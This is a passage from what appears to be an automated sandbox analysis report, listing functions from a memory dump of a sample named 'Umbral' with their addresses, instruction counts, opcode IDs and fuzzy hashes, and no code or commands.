                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 475100ab7748563af60814e1479086de3ecb0f11cd2aaaec06e71aa9c3cb89ef
                                        • Instruction ID: b3f59d9dd7b6bb21091c6b3a593cd5b347a18d312c1712e2c84386283249c8b7
                                        • Opcode Fuzzy Hash: 475100ab7748563af60814e1479086de3ecb0f11cd2aaaec06e71aa9c3cb89ef
                                        • Instruction Fuzzy Hash: 0601F53184D6C96FE756977898550E83FB0EF46214F0402E7E448CB0A3DA6919468351
                                        Function 00007FF848E90C80 Relevance: .1, Instructions: 61COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 395621e4f6c706565b882810288fc05959370d9b10234f2e2865f7e98f09d06f
                                        • Instruction ID: 71e5133893295449fe0e1e9fe6729a32cd449a269aba33ddc225b2d99330d942
                                        • Opcode Fuzzy Hash: 395621e4f6c706565b882810288fc05959370d9b10234f2e2865f7e98f09d06f
                                        • Instruction Fuzzy Hash: 2F01F721B2CE151FA66CB52DA4494B673D0FBA9394B00007FE00EC36C7ED29A8464288
                                        Function 00007FF848E91FCC Relevance: .1, Instructions: 60COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5ff8c761e2a8b0a5008e484a66161b87dcd4d73ea09a3a4e7db0e65ea3dc1f47
                                        • Instruction ID: af52b8db7287140adc963d5de26ea970426b56e19100dc432f85cb59c0811a74
                                        • Opcode Fuzzy Hash: 5ff8c761e2a8b0a5008e484a66161b87dcd4d73ea09a3a4e7db0e65ea3dc1f47
                                        • Instruction Fuzzy Hash: 1611CE3181DA8D9FD711AB6898144A9BFB0FF46344F4001E7D80CCB0A3EB392A55C781
                                        Function 00007FF848EAAD70 Relevance: .1, Instructions: 59COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e0b2d1bf3d38f822517f5dfa1633b7e3008c51ea9878ee41730eb6f52200d863
                                        • Instruction ID: c1167ebef2c59bf80e7982281fc3a86b26348f3da54c36bb9d082b3a41ae6a8b
                                        • Opcode Fuzzy Hash: e0b2d1bf3d38f822517f5dfa1633b7e3008c51ea9878ee41730eb6f52200d863
                                        • Instruction Fuzzy Hash: E801F52051EB8A0FE70AB73858585E53BE0EF86255F4801F7E048CB1D7EA2C9882C385
                                        Function 00007FF848E73E74 Relevance: .1, Instructions: 59COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f4640cc247ecf7c14eb37ff47f7c2e6946b1c1d737736562bdd3a11137101c9d
                                        • Instruction ID: a36dc51e873c0f4d560d5ea3a6a4429c3f79a913543933d5e65da7366b4657e6
                                        • Opcode Fuzzy Hash: f4640cc247ecf7c14eb37ff47f7c2e6946b1c1d737736562bdd3a11137101c9d
                                        • Instruction Fuzzy Hash: 2001042090EA9A0FE395B73C84251783BE0DF9A7C0F4804BAD449CB2E3DD6558858356
                                        Function 00007FF848E8546C Relevance: .1, Instructions: 58COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cfb0d1d67a28c9e4e9abab7811bbfc3a8a3ae25beffc90cdcdc9053bf4d17715
                                        • Instruction ID: 387fccb9ebdddad7b6d47bf03ff8a3c885cc02813b7bac3b88e5eb4a2943e1a7
                                        • Opcode Fuzzy Hash: cfb0d1d67a28c9e4e9abab7811bbfc3a8a3ae25beffc90cdcdc9053bf4d17715
                                        • Instruction Fuzzy Hash: CC11E13180DA8D5FD712AB7498140E9BFB0FF46340F8400EBD84DCB0A2EA352A56C751
                                        Function 00007FF848EAA5A0 Relevance: .1, Instructions: 58COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c01899848dbe57a3f181d17a069746f95c6eb764602b5a7672b95976b3ee2f3a
                                        • Instruction ID: e970d7bfab1e9b36fb74924d234818074ec1e6aaea310cd64a00c70b81aacb06
                                        • Opcode Fuzzy Hash: c01899848dbe57a3f181d17a069746f95c6eb764602b5a7672b95976b3ee2f3a
                                        • Instruction Fuzzy Hash: 5601DE31A0CF098FD755EB1CC444AA6B7E1FF99764F00067AE409D7264CE72E9808BC2
                                        Function 00007FF848E85499 Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ff0dc6f6e78059e8ca0bf8ec58cde3f65c9ca16304702f6836ca61aa7cd65ac1
                                        • Instruction ID: 6444fedbe317812b7b616da59a1310e0443310315e64a007b0d466c092559688
                                        • Opcode Fuzzy Hash: ff0dc6f6e78059e8ca0bf8ec58cde3f65c9ca16304702f6836ca61aa7cd65ac1
                                        • Instruction Fuzzy Hash: 3701283084DBC95FD703977498554E97FB0FF07210F9840EBE889CB0A3DA291696C351
                                        Function 00007FF848E87919 Relevance: .1, Instructions: 55COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d06619a5097e1cba86055f2ca9e22dae0c21117fc95b3cfbbee0e1e9da1d7dd8
                                        • Instruction ID: 8ee765164698aca3c59bd5def02d9e6429b702083299c6182f230148611e37d5
                                        • Opcode Fuzzy Hash: d06619a5097e1cba86055f2ca9e22dae0c21117fc95b3cfbbee0e1e9da1d7dd8
                                        • Instruction Fuzzy Hash: E801243184E6CA5FD742A7344C650E87FB0FF17250F4901EBD888CB093CA291A86C352
                                        Function 00007FF848E7426F Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 09e2c7439b6b7fdb867b72e9c162dfd6d01149850d68ee20e127b81c3f37d20f
                                        • Instruction ID: 63b58ba0ff37d53d697df1d5359e201a0f77c57750927bc21064f4bdf97d029a
                                        • Opcode Fuzzy Hash: 09e2c7439b6b7fdb867b72e9c162dfd6d01149850d68ee20e127b81c3f37d20f
                                        • Instruction Fuzzy Hash: 6A014E32A0D94D4FDB04EA56AC405E577D4FF84378F04027AD80CC3180D7795455C741
                                        Function 00007FF848E73E80 Relevance: .1, Instructions: 52COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9a34cd10ece789f7a425ecbea8d5dadb4b2ea91f67b6dd768f1671194de8f0d2
                                        • Instruction ID: ae2ab61f69822f55f72577d9574720ce76b625d94847cbf157f7dd4e3ec6937a
                                        • Opcode Fuzzy Hash: 9a34cd10ece789f7a425ecbea8d5dadb4b2ea91f67b6dd768f1671194de8f0d2
                                        • Instruction Fuzzy Hash: 45014720A0EA1A0FE398B73C941127937E0DF8E3C0F4404BED409CB2E3DE6599854356
                                        Function 00007FF848ECCB68 Relevance: .1, Instructions: 51COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5a46eb0f6f364610575d85f762747affeb709659b1be4f142fc4b4bcd640cbe5
                                        • Instruction ID: 00c6758dcf8f1a08435d962acdffa621f5bdc9063bbe2b0c26fdef9a483661ec
                                        • Opcode Fuzzy Hash: 5a46eb0f6f364610575d85f762747affeb709659b1be4f142fc4b4bcd640cbe5
                                        • Instruction Fuzzy Hash: D301B122E0DB860FD78AA66944A41747BE1FF56204B2900FBD409CB2A3DEAC9C468316
                                        Function 00007FF848E83328 Relevance: .1, Instructions: 51COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 91bb7d28289be56537d04781df16dcb88c47a24b864adab53c3c389788a36236
                                        • Instruction ID: 1ff97f14d21a038e07877487256d18acc26b902d1690fca4acb13af2242b04d7
                                        • Opcode Fuzzy Hash: 91bb7d28289be56537d04781df16dcb88c47a24b864adab53c3c389788a36236
                                        • Instruction Fuzzy Hash: 4A01B561C0DA8E6FE746AB2C94682FD7FA0EF16284F4841F6D858CB0A3DE3429448345
                                        Function 00007FF848EC45D0 Relevance: .1, Instructions: 51COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0df3a87e446ff277caa30594b45f1f62c8ca68c9d3a5ccde88763ceb2eda23db
                                        • Instruction ID: 042cc4b1a86d4dbad19ccc2a2f3b3f952b8fabeb9b2cd4188ac0fb8311e88ad0
                                        • Opcode Fuzzy Hash: 0df3a87e446ff277caa30594b45f1f62c8ca68c9d3a5ccde88763ceb2eda23db
                                        • Instruction Fuzzy Hash: 06110320D1CB958DF769A36890493B6A7D06F15358F0844BCD4CA466D2CBBDB8C9C345
                                        Function 00007FF848E7EAA4 Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d6ccb823f8ae06e455e28eff5f7402b3f5af1a061f06812bb3cbe68d62767838
                                        • Instruction ID: 6db562d6bb9c21463a2b34678785db5b9afd7382f2a37a73634b4fa85e400455
                                        • Opcode Fuzzy Hash: d6ccb823f8ae06e455e28eff5f7402b3f5af1a061f06812bb3cbe68d62767838
                                        • Instruction Fuzzy Hash: B1F0BB7190EA0E5EFB48EA09EC17AF67794FB46374F04006DF44DC1192D775A863C255
                                        Function 00007FF848EB1470 Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 929617723005aafbdba7da253d7eb8d92945e11794739847c65af01658c22086
                                        • Instruction ID: 572fd9c498c8b9342cd36a96adeee70349e6d7b7a585aca999af85aa3f8a18dd
                                        • Opcode Fuzzy Hash: 929617723005aafbdba7da253d7eb8d92945e11794739847c65af01658c22086
                                        • Instruction Fuzzy Hash: BBF06D31718E099FD7A8FAAD948467272D2FBAC365B50027DD40DC3396DE76E842C740
                                        Function 00007FF848E8D5B8 Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0d2b9a454109e20b1e3b03d6d9a837cece14469b356ae591e24fa094381a0eb
                                        • Instruction ID: 2dbe8cf319bbe7678904bebca579091a7cd0832e67a030802424f672179a2dbf
                                        • Opcode Fuzzy Hash: a0d2b9a454109e20b1e3b03d6d9a837cece14469b356ae591e24fa094381a0eb
                                        • Instruction Fuzzy Hash: 8A01F431C1DA8A9FE745AB3898491EDBFB0FF06250F8402EBD408C71A6EF3969568751
                                        Function 00007FF848EBA250 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d5eba0eb00f3abe42db82076f62f74a8d3eeb54b8b24230fe47376a46f804187
                                        • Instruction ID: c3f6ce059d64510117984a4600470bd461e4570ecfdcdf78afa634d868a21d6b
                                        • Opcode Fuzzy Hash: d5eba0eb00f3abe42db82076f62f74a8d3eeb54b8b24230fe47376a46f804187
                                        • Instruction Fuzzy Hash: ADF0DA30709C0E8FDAA4F71DD858A2973E6FFA935175902A6E40DC7265DF64DC81C781
                                        Function 00007FF848E717E9 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3bb2bbc7477ae9ea0eb274e1b59d5738c0a3603ed60d8c3a4fd75479994e8826
                                        • Instruction ID: e04ece275829db101440fd30677da0bc996936087836638ff5049d516b5a1c4b
                                        • Opcode Fuzzy Hash: 3bb2bbc7477ae9ea0eb274e1b59d5738c0a3603ed60d8c3a4fd75479994e8826
                                        • Instruction Fuzzy Hash: 95018F3150CB895FD786E728D4605A6BBE1FF89360F4405BEE489C72A2CB2599418786
                                        Function 00007FF848E8062D Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 18b6be94dfa9de09d3c962753a738339dfa60ed6db7ab8058df4facfe06a7978
                                        • Instruction ID: 2de51ec5b93425de817464877fa258615d78e1333361c34debb09bb6a7e35796
                                        • Opcode Fuzzy Hash: 18b6be94dfa9de09d3c962753a738339dfa60ed6db7ab8058df4facfe06a7978
                                        • Instruction Fuzzy Hash: B501F53290DB890FF321E62098255DA7BD1BB91260F44077AD0A58B1F1EE68650987D2
                                        Function 00007FF848E77CC0 Relevance: .0, Instructions: 44COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a8f5709bd0f44305f1990aa848e1b28fd8444399c0979e66c8509f82626574ca
                                        • Instruction ID: 9bcd2be81f02d4f533ff3b4582084260f2d26f83c230da4fee328937dca92880
                                        • Opcode Fuzzy Hash: a8f5709bd0f44305f1990aa848e1b28fd8444399c0979e66c8509f82626574ca
                                        • Instruction Fuzzy Hash: 54F0AF31E0891D9EDB90BB6894462FD7BE0EF58380F004176D418E3289DE3819014BC1
                                        Function 00007FF848E92FA4 Relevance: .0, Instructions: 44COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4d35ce9033ebf2625aebf92fdf989ffa8f836da2a2fa4543e1773fe96791e411
                                        • Instruction ID: 50eca1236e10701a487bd8e3386e0d8e2361ec2d78caad66c1d41f36ecd4de02
                                        • Opcode Fuzzy Hash: 4d35ce9033ebf2625aebf92fdf989ffa8f836da2a2fa4543e1773fe96791e411
                                        • Instruction Fuzzy Hash: 2F01246148F7C20FD3435BB889615823FF59D5B220B0E41DBD4C4CF0A3D14E894AC322
                                        Function 00007FF848E81560 Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 647cd3cfffbbf9498d8668ce55de425b16ff067b9fe35d95b77d3416e4e649b2
                                        • Instruction ID: d35b9823fc3ab90072dd3c14adbab0de9c7c9e573ebff91d16455a295716cbad
                                        • Opcode Fuzzy Hash: 647cd3cfffbbf9498d8668ce55de425b16ff067b9fe35d95b77d3416e4e649b2
                                        • Instruction Fuzzy Hash: 29F0183192CA094EE754FB38940957EB6E0FF98355F440A7AA88DD3165FF38D5804685
                                        Function 00007FF848EC4530 Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8f0b5c94bff9b27b944bf67636f2e09c78e38c533929d1384f3948edde9d4ef3
                                        • Instruction ID: 2656cf05f20047e48a1dc3b43f0d13f6abeb49230b901a3addad639ac82d2229
                                        • Opcode Fuzzy Hash: 8f0b5c94bff9b27b944bf67636f2e09c78e38c533929d1384f3948edde9d4ef3
                                        • Instruction Fuzzy Hash: 1CF0F920A1C90ECFDE94FA2CC45992573E0FF68784B6449ACD40ECB2A5EA26EC46C704
                                        Function 00007FF848E9FFE0 Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7424542bc01e62dc3b42ad30c252317bc41cd7dca192911b2c23a7ffd1fd5dd6
                                        • Instruction ID: 3cadcb3fb4fbdf6973b83ebf076baf416e8d7ea75ba0aca60d3acf678af83942
                                        • Opcode Fuzzy Hash: 7424542bc01e62dc3b42ad30c252317bc41cd7dca192911b2c23a7ffd1fd5dd6
                                        • Instruction Fuzzy Hash: ECF0E231E09E1E9FD29AB62C549093132D0FF8E750B940979C40CC7285DE3ADC428380
                                        Function 00007FF848ECDFB0 Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16d929d4c98655925a1e4f1ce3e18235ade5275bed5367ec3ab287877681b3b6
                                        • Instruction ID: d2afaedb320532eb016e864d24549622658014ff8120c7d8b3e3c4f7bf929b40
                                        • Opcode Fuzzy Hash: 16d929d4c98655925a1e4f1ce3e18235ade5275bed5367ec3ab287877681b3b6
                                        • Instruction Fuzzy Hash: F7F08221F0C95A0FEAA8E66DB49467476D1FF88261B4401FAD40DC7195DA25CC858385
                                        Function 00007FF848E8A69D Relevance: .0, Instructions: 37COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 994be84e3607f2d1ca03e0323782ac2c8c08f6eb8c7e638c4a5a2ca032bd15e7
                                        • Instruction ID: 92b07fe40c14551928cc2e1256b8474977fc9c287b3ea18102fbf9d648f605df
                                        • Opcode Fuzzy Hash: 994be84e3607f2d1ca03e0323782ac2c8c08f6eb8c7e638c4a5a2ca032bd15e7
                                        • Instruction Fuzzy Hash: 6AE02212F2C8060BF264759E28C96FE5285EFEC2A0F984137E41DC3286CE6868821289
                                        Function 00007FF848E89DD8 Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 82054e097334cac0c9b1971521b2cb92f932bae40d727ae9c7392ca81d15f334
                                        • Instruction ID: 94b1c3cfbd213e5d067e7020188308d4ab71768a907587b0f62596dfd5935ad3
                                        • Opcode Fuzzy Hash: 82054e097334cac0c9b1971521b2cb92f932bae40d727ae9c7392ca81d15f334
                                        • Instruction Fuzzy Hash: 8BF0BE41D4CAA60DFBF6616A24493BA7DC0AB11350F8815BAD88DC59E1DE1CF8C58389
                                        Function 00007FF848E71A80 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0365c27591ae0b3c5ac059206f3f776c05596b3b8abe6a1b1b844dbe6705f8e4
                                        • Instruction ID: 9fa6277a04d71f8199978c1b19524ef5b6ec8d4a68778b9a114dcb0f9689dabb
                                        • Opcode Fuzzy Hash: 0365c27591ae0b3c5ac059206f3f776c05596b3b8abe6a1b1b844dbe6705f8e4
                                        • Instruction Fuzzy Hash: 9DE0D871D4CB4C4FDB50BA69A8159D97BA4FB85394F040069E01DC3281D7359955C356
                                        Function 00007FF848E86AA4 Relevance: .0, Instructions: 28COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 301f0838ce5e029193e08f8df441e86b4242526778ebf1834eaac0d2608532f1
                                        • Instruction ID: ef0124a32b7245f3998e41e5ed9ec692faa996d490b8a60ff9eceee9b8ecd359
                                        • Opcode Fuzzy Hash: 301f0838ce5e029193e08f8df441e86b4242526778ebf1834eaac0d2608532f1
                                        • Instruction Fuzzy Hash: 2CE04F01F2C9168DE154761C74492BD52C2FB842D0FD886B2D00EC71E6CE6D9842018A
                                        Function 00007FF848E709AD Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8009c6b3adfde4081285c23677560c21002c8e7141f1eafc4690deb6a08c40a4
                                        • Instruction ID: b7fb324b3522efe9017ef0fa541502d747b8d7e662f0977bc2af29340c1dc81f
                                        • Opcode Fuzzy Hash: 8009c6b3adfde4081285c23677560c21002c8e7141f1eafc4690deb6a08c40a4
                                        • Instruction Fuzzy Hash: 99E0C222F5A80A1DFA48B3B4681B1FEB295EFC4344FC15876E00DC2083CE2939010295
                                        Function 00007FF848E70CFD Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 61a24cdf9e8e0fe3a13dd2d30a5567ceb5710846a66a5bd8fbab26ac6de67cc3
                                        • Instruction ID: 7ef1a4fce07468ae5225370a9e78b843fbbcd870b8b38f4eb6f72c5783308cc9
                                        • Opcode Fuzzy Hash: 61a24cdf9e8e0fe3a13dd2d30a5567ceb5710846a66a5bd8fbab26ac6de67cc3
                                        • Instruction Fuzzy Hash: EBE0C221FAA80E5DEA48B3B468165FDB255EF88340FC01832E10DC2083CE2935010195
                                        Function 00007FF848E86A10 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 77619b89dca25b1f64211a18318519eeea113227f436b29b4320dd66188c35bb
